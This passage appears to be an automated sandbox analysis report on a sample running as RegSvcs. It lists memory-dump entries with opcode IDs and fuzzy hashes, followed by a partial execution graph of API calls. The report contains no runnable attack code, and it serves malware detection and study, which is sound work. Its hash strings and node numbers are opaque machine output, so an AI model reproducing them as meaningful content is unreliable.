                                            • Instruction Fuzzy Hash: B031C679B003258BFF2ED969599427FB7DAABCC610F19483BD826C7380DB74CC858661
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: bd9cd17c8e2775df4b17fbb85ba729ab8ce43d5c3b53a21b9fee11156dbd991f
                                            • Instruction ID: a01e31e513c6d1f2b9bf88ad6326e34bc719d046b69932e1720da6684f2409c7
                                            • Opcode Fuzzy Hash: bd9cd17c8e2775df4b17fbb85ba729ab8ce43d5c3b53a21b9fee11156dbd991f
                                            • Instruction Fuzzy Hash: 2E22C37490021ACFCB64EF64E984AAEBBB9FF4C300F1095A9D909A7318DB395D85CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: 76ff52a3703855d3af00067193bee0b80fd06824d792922d1386703c037c940a
                                            • Instruction ID: ffb16fe025c224b3e334cde916f019164af4b7f8d709f07cb7f9fed57f0572d7
                                            • Opcode Fuzzy Hash: 76ff52a3703855d3af00067193bee0b80fd06824d792922d1386703c037c940a
                                            • Instruction Fuzzy Hash: 4322C374A0021ACFCB64EF64E984AAEBBB9FF4C300F1095A9D909A7318DB355D85CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: e0779c016521510732b2b15fe4c03b849456388c3843c19afa84c90bafa2ac3e
                                            • Instruction ID: d30a9dccf2e2ee3266235b493f94a19f2f6d2b23e4bfb7763294efc9d4167759
                                            • Opcode Fuzzy Hash: e0779c016521510732b2b15fe4c03b849456388c3843c19afa84c90bafa2ac3e
                                            • Instruction Fuzzy Hash: 9D41CE357002189FDB18EB68D854AAE7BFABFCD210F14446AD516EB391DF319C06CBA0
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9c9af517bf47f395d9ec57707b031ae637a81c181ec9ba3f717a2f15915baf7
                                            • Instruction ID: c5644881b3e505dc9d471e87eea46a728f42891a138a07fd5d27dd8fdbddfcaf
                                            • Opcode Fuzzy Hash: e9c9af517bf47f395d9ec57707b031ae637a81c181ec9ba3f717a2f15915baf7
                                            • Instruction Fuzzy Hash: C8F11A75A005158FDB04DF6DC9849ADBBF6FF8C310B1A80AAE516AB361CB35EC85CB50
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24cd5cde411e63ff5d8af618cf30f406f98bc745d3a4fe9a33234fc855452816
                                            • Instruction ID: c04f67739e5062a07d63fbdbda1c4ba4748a109c30d8b354c71aba0eb8017762
                                            • Opcode Fuzzy Hash: 24cd5cde411e63ff5d8af618cf30f406f98bc745d3a4fe9a33234fc855452816
                                            • Instruction Fuzzy Hash: D471E834710205CFEF59DF29C898AA97BE5AF4D610F1940AAE906CB3B1DB70DC41CBA1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92e82b55ad4f26bd7a8b229196f84d0d80e95b5e78beaee6d399b5a56b95355a
                                            • Instruction ID: 5159526e0c9f247c328c2b27b1fd58b15fcf2c9478b036fd31cb1ac011de53d2
                                            • Opcode Fuzzy Hash: 92e82b55ad4f26bd7a8b229196f84d0d80e95b5e78beaee6d399b5a56b95355a
                                            • Instruction Fuzzy Hash: 1351BD7402634B8FC34C3F21B9AC12ABBA5FB4F3277457D54E04E9582EAB345489CA31
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 564ed56b664ab2cbb16883534c8b5c84f97cbfe0e2e27cc56dfee33f9ddba21e
                                            • Instruction ID: 69ac7f7c406f3a5ad310a960351eb68636e1b990a8cb3e2cfad6f5e453c94d26
                                            • Opcode Fuzzy Hash: 564ed56b664ab2cbb16883534c8b5c84f97cbfe0e2e27cc56dfee33f9ddba21e
                                            • Instruction Fuzzy Hash: C0518DB402234B8FC64C3F25B6AC12ABBA5FB4F3277457D54F04E9182EAB3454858E31
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ab4f21fff5ae7df766586e7a6c182a5f1ca729fcc6af3b1d7fb112183faa176
                                            • Instruction ID: 17b84dcd5396421f5447ade72bda2faedfa1da4e1e1d6813dc16a7effe8e57de
                                            • Opcode Fuzzy Hash: 0ab4f21fff5ae7df766586e7a6c182a5f1ca729fcc6af3b1d7fb112183faa176
                                            • Instruction Fuzzy Hash: 3F51B878E01208DFCB58DFA9D99099EBBB6FF8D300B209469E905AB324D735AD41CF40
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91f508b4578cfe4b0ef2c6e0b90722c7f9afd7dc92470c2d663e009e4119bae4
                                            • Instruction ID: 3adb167e20ffa1af3fa11f5acae2b80093da1d1d39508db84e4956776f1496b2
                                            • Opcode Fuzzy Hash: 91f508b4578cfe4b0ef2c6e0b90722c7f9afd7dc92470c2d663e009e4119bae4
                                            • Instruction Fuzzy Hash: 1D518374E01208DFDB54DFA9D9849DDBBF2BF89300F24916AE819AB364DB31A901CF50
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51ff10910f71ae11260d194b73cd8e381ef092a0d14e157655da7bdc2110b647
                                            • Instruction ID: e5de48a7f4d17e985bb6a34f869d727fe657fa85971a96febaaae35d7974f59e
                                            • Opcode Fuzzy Hash: 51ff10910f71ae11260d194b73cd8e381ef092a0d14e157655da7bdc2110b647
                                            • Instruction Fuzzy Hash: 5C519574E01208CFCB58DFA9D99499EBBB2FF8D311B209469E505AB364DB35AC45CF40
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e04cde9ace074af6ee0098d3c9cc450c7858fd8197ef959a3213df0cbf3a203
                                            • Instruction ID: 2a83793964965ade31e2219eb62a162c54843b39e2fcc29fb91b08faa0df22fd
                                            • Opcode Fuzzy Hash: 8e04cde9ace074af6ee0098d3c9cc450c7858fd8197ef959a3213df0cbf3a203
                                            • Instruction Fuzzy Hash: 9B419331A04249DFEF15CFA4C844A9DBFB6FF4E310F04859AE8169B291E334D950CBA0
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dde532317559284114df8a74b9e5411b3b72166c080b687a24fe86be0651ef3
                                            • Instruction ID: f16a4927901509363ceeceadd239da85b9d5954740f5173d5c3a1584c1481cad
                                            • Opcode Fuzzy Hash: 1dde532317559284114df8a74b9e5411b3b72166c080b687a24fe86be0651ef3
                                            • Instruction Fuzzy Hash: E331803160420AAFDF05DF65D894AAE3BA6FF8C300F044469F9159B250DF39DC62CBA0
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4b0246c7ea9955eb3f486fa559b57d2b98cf4a55f20bc09c66f41f944fe102d
                                            • Instruction ID: 27e0f228faa1adbd67d8a2e32153d65a3265c930cb653cab6dca2a9574396c8b
                                            • Opcode Fuzzy Hash: e4b0246c7ea9955eb3f486fa559b57d2b98cf4a55f20bc09c66f41f944fe102d
                                            • Instruction Fuzzy Hash: 0121D3363242015BFF1EA6398C9CA39369BAFCD614B1840A7D506CB7D5EF25CC82D292
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b34e2e5750486b57ae53ee191d536be10531818330a9ccc91c00683922a5e5a3
                                            • Instruction ID: c3f55d128f9fde7620da11c0dc8673060c2a6ebd0ba38ac16327c007f6156542
                                            • Opcode Fuzzy Hash: b34e2e5750486b57ae53ee191d536be10531818330a9ccc91c00683922a5e5a3
                                            • Instruction Fuzzy Hash: 32319270E005158FDF04CF6DC8889AEBBBAFF89310B15815AE5169B3A5C730EC46CB90
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e650e378052d79eed8509d5e72a76ca7df9f06da8048a9ff30cedd2be2a966e7
                                            • Instruction ID: 28f09547a53b30f6dbda7d48c637423fc5ca95b8ed617162487e51558e62b676
                                            • Opcode Fuzzy Hash: e650e378052d79eed8509d5e72a76ca7df9f06da8048a9ff30cedd2be2a966e7
                                            • Instruction Fuzzy Hash: 4421A13632420557FF1DA6258C9CA7A369BAFCC618F1840BAD506CB7D8EF25CC829391
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67036c73281a6432656e4a358323582a33410e311ecb4ee964fb937c90074d6f
                                            • Instruction ID: 07f80b456b61b1f30ab60536611db7cc3b29739b68103352b71e371d3274a36c
                                            • Opcode Fuzzy Hash: 67036c73281a6432656e4a358323582a33410e311ecb4ee964fb937c90074d6f
                                            • Instruction Fuzzy Hash: E531B4356041098FDF18DF65E984BAA7BB6FF8C710F1040A9E5059B254DF38DD62CBA0
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fae4a6b1db53e8c351569347f41d7596e45666ab79649628cd100fe38716a3e8
                                            • Instruction ID: 555f2c82e4cc5112882a29e75f97299a4c338f2ee00edc7f9915161ddffd9374
                                            • Opcode Fuzzy Hash: fae4a6b1db53e8c351569347f41d7596e45666ab79649628cd100fe38716a3e8
                                            • Instruction Fuzzy Hash: 6121E531A00209AFCF14DF24D9409AF77B9EB8C360F15C85AD9098B254EB35EE46CBD1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92bcf2c4d84bbce1b894258044d81e0a34652a54c9b5d2ffcf8e71ec7565d2c1
                                            • Instruction ID: 9e7837edfcb061e6882fe8cfe9863d8eee7165234ffe817cb71d17cf9329bba6
                                            • Opcode Fuzzy Hash: 92bcf2c4d84bbce1b894258044d81e0a34652a54c9b5d2ffcf8e71ec7565d2c1
                                            • Instruction Fuzzy Hash: 092109349012098FDF08DFB0E850AEEB7B6FB8E301F10A569D911773A4CB399942CE64
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32ecbd312c8356ada25f8f80eb7751cb1ec2e6488c5ffce4f291b82b9b7ee449
                                            • Instruction ID: 545290127cfa34edf59faf970099c672d622d9cb3c2b93b949427034dce955c2
                                            • Opcode Fuzzy Hash: 32ecbd312c8356ada25f8f80eb7751cb1ec2e6488c5ffce4f291b82b9b7ee449
                                            • Instruction Fuzzy Hash: 90212531C112198ECF10EFE8E9446ECFBB4FF5A301F109629E40577258EB346A8ACB90
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2359b58897567ec2da9241bb6efb78025804141642a11f262d1916dc265e6f4
                                            • Instruction ID: b4e4b83ffbf40dbb210e3d2d390949be4b771bd3a1ef99a71b51d9cab69d282d
                                            • Opcode Fuzzy Hash: f2359b58897567ec2da9241bb6efb78025804141642a11f262d1916dc265e6f4
                                            • Instruction Fuzzy Hash: 1921A1357016128BDB2ADA29C49452EB3A7FFCD660B09416AE806EB354DF34DC0287D0
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acb79afdc43584ad995325e65d776cf7daec7aec8129cec6d4d18fec18438937
                                            • Instruction ID: eb772e8fa25e00698b9316e1f45f6327d892bc09c85800db6a1c9463543d539b
                                            • Opcode Fuzzy Hash: acb79afdc43584ad995325e65d776cf7daec7aec8129cec6d4d18fec18438937
                                            • Instruction Fuzzy Hash: A1112C31E0834D9FCB02DBB89C108DEBB34EF892107258797D566B7191E6315906C361
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61742a97b8b2e8dc8aa214f29e75c89ae175bcbbd573b7c794b54cea4e77bb33
                                            • Instruction ID: 98d7b0139c2e5105a0d9550d2ef1a9f69997f7c33a54b7dbf65a52c2525e9a4d
                                            • Opcode Fuzzy Hash: 61742a97b8b2e8dc8aa214f29e75c89ae175bcbbd573b7c794b54cea4e77bb33
                                            • Instruction Fuzzy Hash: 0731A978E01208CFCB54DFA4E9948ADBBB6FF4D300B20545AE505AB324D735AD45CF40
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0b7c174f24d86ae67194b4fbdb6269f747a9168c7f7894b88fb3c32caa620d6
                                            • Instruction ID: aee9f7410aba0aac69c97ca29909be1573e750a89fbdcebb72dfec42d5750aa8
                                            • Opcode Fuzzy Hash: a0b7c174f24d86ae67194b4fbdb6269f747a9168c7f7894b88fb3c32caa620d6
                                            • Instruction Fuzzy Hash: 382106349012098FCB08DFB4E850AEEB7B6FB8E301F10A569D405733A4DB3AA945CE64
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d15ca85a13faf837cb636f9586f092126740741b7f2a9e44f0501e99a28f33d
                                            • Instruction ID: 37281c05eb0972c36e2a6ed6f71d44dcf3e9a92d513cce29cfb80af58e7340a5
                                            • Opcode Fuzzy Hash: 4d15ca85a13faf837cb636f9586f092126740741b7f2a9e44f0501e99a28f33d
                                            • Instruction Fuzzy Hash: 3921F0B4C0520A8FDB15EFA8C9445EEBFB4FF49300F1441AAD845B7265EB311A89CBA1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17df7264a8b8c7eab1f2eb7fef03e82a1e6d92c602e642e383c609c3a409fd72
                                            • Instruction ID: 1365ebd74990c3296a104a70e42580e184e344059f883d2895c333d32f5ffaab
                                            • Opcode Fuzzy Hash: 17df7264a8b8c7eab1f2eb7fef03e82a1e6d92c602e642e383c609c3a409fd72
                                            • Instruction Fuzzy Hash: 3C21EEB4C0524E8FCF48EFA8D9455EEBBF4BB4D301F10416AD805B2214EB341A89CBA1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04e5e827f0d5e000996bfa0bc7d0c436289dd9ab1c3d740430836dbdbe1321ef
                                            • Instruction ID: 0009bece3ee148bdc9afdccff28b35b7061bb42f06fd1829e27e9224405d8e58
                                            • Opcode Fuzzy Hash: 04e5e827f0d5e000996bfa0bc7d0c436289dd9ab1c3d740430836dbdbe1321ef
                                            • Instruction Fuzzy Hash: 1001D6317041196FDF06DE5998106EE3BE7EFCE250B198027F915EB290DB71C80287A1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5dd0861a3c4671f6a0671169bc3cf0bb62ca43de339b28b2d4c5dc7936454f9c
                                            • Instruction ID: 9f57daa98a9c6218fb589cbc1a53133137f9fcb3964c2ec165a5bb1bd0521330
                                            • Opcode Fuzzy Hash: 5dd0861a3c4671f6a0671169bc3cf0bb62ca43de339b28b2d4c5dc7936454f9c
                                            • Instruction Fuzzy Hash: 1FE09236C2436E5BCF05DBA4D8048DEFB38EE97210B5A4A97D5206B056E770254AC7A1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 747671b012b5b6d19f25321be5313bc35b41c1f34affe8e6fd7985e0ac8a63e7
                                            • Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
                                            • Opcode Fuzzy Hash: 747671b012b5b6d19f25321be5313bc35b41c1f34affe8e6fd7985e0ac8a63e7
                                            • Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 1826336df12948c88dc51e4314582fa8b246bfe209e45ebaa5217ebd32488553
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: E0C0123310C1242BAA24504E7C409A3674CC2CA2B4A150177F51C9720055429C8041B4
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 498314a507476d263e4d93817e20443acdbc1a6d4c0880f73c7c47f190127365
                                            • Instruction ID: 5cd35571027ed135ef8a424c8f4f7e55a34741ec21029c96b80169a78f77d0e1
                                            • Opcode Fuzzy Hash: 498314a507476d263e4d93817e20443acdbc1a6d4c0880f73c7c47f190127365
                                            • Instruction Fuzzy Hash: ABD0677AB510189FCB049F98E8808DDB7B6FF9C221B048116E915A3265C6319961DB60
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e700cf67f46ccc1987d2fde9b248ec9472c3262674cbea4e6aa25012f2bab08
                                            • Instruction ID: 1e3f9cfb64480fe96fc7c4ea04a73215464aed9edb535f27f7cd5ac2e2dec7ee
                                            • Opcode Fuzzy Hash: 6e700cf67f46ccc1987d2fde9b248ec9472c3262674cbea4e6aa25012f2bab08
                                            • Instruction Fuzzy Hash: 96D0C2700187464BC716F735EA804243B3DFE84304F800A94F4054A006EA7A584947A2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b162b472ba8cf72ee07a852cb182a7c190af1ec6e08a68177e582b0feff5690
                                            • Instruction ID: 73eafb0a46afac59dd7a9b3483677d569f6d38045b7762acfb161ae5eca44060
                                            • Opcode Fuzzy Hash: 2b162b472ba8cf72ee07a852cb182a7c190af1ec6e08a68177e582b0feff5690
                                            • Instruction Fuzzy Hash: 65C0127010470A47C556F775EA85565372EFFC4300F805914F00A0A116EF7D2C8547A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \;cq$\;cq$\;cq$\;cq
                                            • API String ID: 0-2961067002
                                            • Opcode ID: 010a3ab01d43933741e8cf06737891f2525aec19c115a5fd1978a5c2a7c10b43
                                            • Instruction ID: e5e8f24ff41b959d3b15bb28bf5a15d08e3cccab39b17f6090b5096a0c526d94
                                            • Opcode Fuzzy Hash: 010a3ab01d43933741e8cf06737891f2525aec19c115a5fd1978a5c2a7c10b43
                                            • Instruction Fuzzy Hash: C8015E317101148FEF28CA2DC48492A77A6AFDC67076F416BE506CB2A4DB71DC818760

                                            Execution Graph

                                             Execution Coverage: 13%
                                             Dynamic/Decrypted Code Coverage: 100%
                                             Signature Coverage: 0%
                                             Total number of Nodes: 266
                                             Total number of Limit Nodes: 16
                                            execution_graph 24010 e0e590 24012 e0e5b7 24010->24012 24011 e0e694 24012->24011 24014 e0e158 24012->24014 24015 e0f648 CreateActCtxA 24014->24015 24017 e0f74e 24015->24017 24018 9db73aa 24019 9db7399 24018->24019 24020 9db73a8 24018->24020 24019->24020 24021 9db91e8 12 API calls 24019->24021 24022 9db9198 12 API calls 24019->24022 24023 9db9188 12 API calls 24019->24023 24021->24020 24022->24020 24023->24020 23699 9a61b80 23700 9a61bba 23699->23700 23701 9a61c36 23700->23701 23702 9a61c4b 23700->23702 23707 9a6176c 23701->23707 23703 9a6176c 3 API calls 23702->23703 23705 9a61c5a 23703->23705 23708 9a61777 23707->23708 23709 9a61c41 23708->23709 23712 9a62688 23708->23712 23718 9a62678 23708->23718 23725 9a617b4 23712->23725 23714 9a626af 23714->23709 23716 9a62752 CreateIconFromResourceEx 23717 9a627ad 23716->23717 23717->23709 23719 9a62688 23718->23719 23720 9a617b4 CreateIconFromResourceEx 23719->23720 23722 9a626a2 23720->23722 23721 9a626af 23721->23709 23722->23721 23723 9a62752 CreateIconFromResourceEx 23722->23723 23724 9a627ad 23723->23724 23724->23709 23726 9a626d8 CreateIconFromResourceEx 23725->23726 23728 9a626a2 23726->23728 23728->23714 23728->23716 23729 9db753c 23730 9db7399 23729->23730 23731 9db73a8 23729->23731 23730->23731 23735 9db91e8 23730->23735 23755 9db9188 23730->23755 23774 9db9198 23730->23774 23736 9db9194 23735->23736 23737 9db91ef 23735->23737 23740 9db91d6 23736->23740 23793 9db9851 23736->23793 23798 9db98d2 23736->23798 23802 9db95f2 23736->23802 23806 9db9713 23736->23806 23821 9db9cfe 23736->23821 23826 9db97da 23736->23826 23830 9db9666 23736->23830 23843 9db9f67 23736->23843 23848 9db96e0 23736->23848 23861 9db97a1 23736->23861 23866 9db9881 23736->23866 23879 9db9a22 23736->23879 23893 9db9ac3 23736->23893 23898 9db982c 23736->23898 23903 9db992d 23736->23903 23908 9db9649 23736->23908 23737->23731 23740->23731 23756 9db91b2 23755->23756 23757 9db97da 2 API calls 23756->23757 
